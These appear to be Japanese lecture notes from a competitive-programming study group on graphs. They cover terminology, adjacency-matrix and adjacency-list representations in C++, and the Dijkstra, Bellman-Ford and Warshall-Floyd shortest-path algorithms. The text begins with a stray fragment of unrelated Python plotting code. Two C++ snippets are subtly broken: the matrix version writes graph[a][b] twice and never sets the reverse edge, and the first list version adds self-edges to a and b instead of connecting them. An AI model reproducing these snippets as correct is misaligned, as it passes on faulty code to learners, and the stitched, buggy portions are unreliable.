nadaraya_6_40(dat,x,sgm),X) plt.plot(X, pres) plt.show()
第Ⅲ回プロコン分科会(木、グラフについてその1)
森、木、グラフ、有向無向、頂点、辺、重み、(非)連結、(入|出)次数、隣接、パス、閉路、多重辺、自己辺、橋、関節点、根、親、子、DAG、なもり木、とか用語についての解説はその場でします。(図を書くのがめんどい)
(グラフの場合は、ある程度問題文を見ればわかるので適当にARCとかを漁ってみて)
グラフの扱い方とかアルゴリズムとかについておおざっぱに
以降、Vは頂点数、Eは辺の数を表します。
グラフの持ち方
A_iとB_iが重みC_iの辺で繋がってるとき、
A_1 B_1 C_1 A_2 B_2 C_2 ...
みたいに入ってくるとする。
隣接行列
int graph[205][205]; rep(i,E){ int a,b,c; scanf("%d%d%d",&a,&b,&c); graph[a][b] = c; graph[a][b] = c; }
楽に書ける、ワーシャルフロイド法とかはこれを使う。
Vが10^5くらいになるとメモリが死ぬので使えない。
隣接リスト
vector<pair<int,int> > graph[205]; rep(i,E){ int a,b,c; scanf("%d%d%d",&a,&b,&c); graph[a].push_back(make_pair(a,c)); graph[b].push_back(make_pair(b,c)); }
typedef long long int lli; typedef pair<lli,lli> mp; vector<mp> vs[100005]; rep(i,E){ lli a,b,c; scanf("%lld%lld%lld",&a,&b,&c); vs[a].push_back(mp(b,c)); vs[b].push_back(mp(a,c)); }
こちらの方が一般的。速い。メモリが軽い。
最短経路問題
ダイクストラ法
1つの頂点からの他の全頂点に対する最短経路が求まる。
全辺の重みが負でない時に使える。
一番早い。O(ElogV)。密なグラフ(E≈V^2)のときは、O(V^2)のアルゴリズムを使った方がよい。
priority_queue<int,vector<int>,greater<int> > que;
ベルマンフォード法
1つの頂点からの他の全頂点に対する最短経路が求まる。
負の重みの辺があっても使える。負閉路検出ができる。
O(EV)。そこそこ高速。
ワーシャルフロイド法
全ての頂点からの他の全頂点に対する最短経路が求まる。
負の重みの辺があっても使える。負閉路検出ができる。
O(V^3)で重さはそれなり。
実装がめちゃ軽いので楽に最短路を求めたいときにオススメ。
rep(k,V) rep(i,V) rep(j,V) if(d[i][k] + d[k][j] < d[i][j]) d[i][j] = d[i][k] + d[k][j];
その他
GDraw (グラフの可視化ができる)